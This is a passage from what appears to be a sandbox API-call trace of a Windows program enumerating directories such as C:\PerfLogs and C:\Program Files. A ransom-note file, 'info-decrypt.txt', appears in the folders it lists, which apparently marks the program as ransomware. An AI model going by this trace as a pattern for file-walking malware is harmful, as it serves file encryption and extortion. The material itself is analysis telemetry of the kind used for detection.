ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.049] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.049] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Admin", cAlternateFileName="")) returned 1 [0132.049] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0132.049] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af104 | out: lpFindFileData=0x67af104*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 0 [0132.049] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af38c) returned 1 [0132.049] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af398) returned 1 [0132.049] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x67af37c) returned 1 [0132.049] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x67aee84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0132.049] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x67aee58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0132.050] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x67af0a4 | out: lpFindFileData=0x67af0a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.050] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af0b4 | out: lpFindFileData=0x67af0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.050] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af0b4 | out: lpFindFileData=0x67af0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0132.050] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af33c) returned 1 [0132.050] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af348) returned 1 [0132.050] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x67af37c) returned 1 [0132.050] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin", nBufferLength=0x105, lpBuffer=0x67aee84, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin", lpFilePart=0x0) returned 0x11 [0132.051] GetFullPathNameW (in: lpFileName="C:\\PerfLogs\\Admin\\", nBufferLength=0x105, lpBuffer=0x67aee58, lpFilePart=0x0 | out: lpBuffer="C:\\PerfLogs\\Admin\\", lpFilePart=0x0) returned 0x12 [0132.051] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x67af0a4 | out: lpFindFileData=0x67af0a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0132.051] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af0b4 | out: lpFindFileData=0x67af0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.051] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x67af0b4 | out: lpFindFileData=0x67af0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0132.051] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0132.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af33c) returned 1 [0132.051] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x67af348) returned 1 [0132.052] CoUninitialize () [0132.053] SysReAllocStringLen (in: pbstr=0x67afb50*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x67afb50*="KERNEL32.DLL") returned 1 [0132.053] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0132.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0132.057] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 115 os_tid = 0x180 [0131.419] SysReAllocStringLen (in: pbstr=0x6d8f4dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6d8f4dc*="KERNEL32.DLL") returned 1 [0131.419] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.421] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.422] SysReAllocStringLen (in: pbstr=0x6d8f4dc*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6d8f4dc*="KERNEL32.DLL") returned 1 [0131.422] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.424] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.425] SysReAllocStringLen (in: pbstr=0x6d8f4b8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x6d8f4b8*="KERNEL32.DLL") returned 1 [0131.425] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0131.425] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0131.427] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0131.429] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0131.430] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0131.981] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ef8c) returned 1 [0131.981] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x6d8ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0131.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x6d8ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0131.981] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6d8ecb4 | out: lpFindFileData=0x6d8ecb4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.981] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe69b6600, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69b6600, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd23a40, ftCreationTime.dwHighDateTime=0x1d68bac, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x4d2, dwReserved0=0x0, dwReserved1=0x0, cFileName="info-decrypt.txt", cAlternateFileName="INFO-D~1.TXT")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0131.982] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe6565e20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6565e20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0131.983] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe65b20e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe65b20e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0131.983] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe0aa5760, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0aa5760, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0131.983] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe590cc00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe590cc00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0131.983] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xe0acb8c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0acb8c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0131.983] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0a0d1e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0a0d1e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0131.985] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe2aa1f00, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe2aa1f00, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0131.985] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0131.993] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eab37af, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0131.993] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa250a38, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e472dd2, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0131.993] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe6b7f680, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe6b7f680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0131.993] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0131.994] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xe0aa5760, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0aa5760, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0131.994] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe69904a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe69904a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Photo Viewer", cAlternateFileName="WINDOW~4")) returned 1 [0131.994] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe0af1a20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe0af1a20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Portable Devices", cAlternateFileName="WIBFE5~1")) returned 1 [0131.994] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 1 [0131.994] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xe658bf80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe658bf80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Sidebar", cAlternateFileName="WI4223~1")) returned 0 [0131.994] FindClose (in: hFindFile=0xb7ef50 | out: hFindFile=0xb7ef50) returned 1 [0131.994] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef4c) returned 1 [0131.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ef58) returned 1 [0131.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ef8c) returned 1 [0131.995] GetFullPathNameW (in: lpFileName="C:\\Program Files", nBufferLength=0x105, lpBuffer=0x6d8ea94, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files", lpFilePart=0x0) returned 0x10 [0131.995] GetFullPathNameW (in: lpFileName="C:\\Program Files\\", nBufferLength=0x105, lpBuffer=0x6d8ea68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\", lpFilePart=0x0) returned 0x11 [0131.995] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6d8ecb4 | out: lpFindFileData=0x6d8ecb4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7ef50 [0131.995] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcd23a40, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcd23a40, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0131.995] FindNextFileW (in: hFindFile=0xb7ef50, lpFindFileData=0x6d8ecc4 | out: lpFindFileData=0x6d8ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x69da35f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, 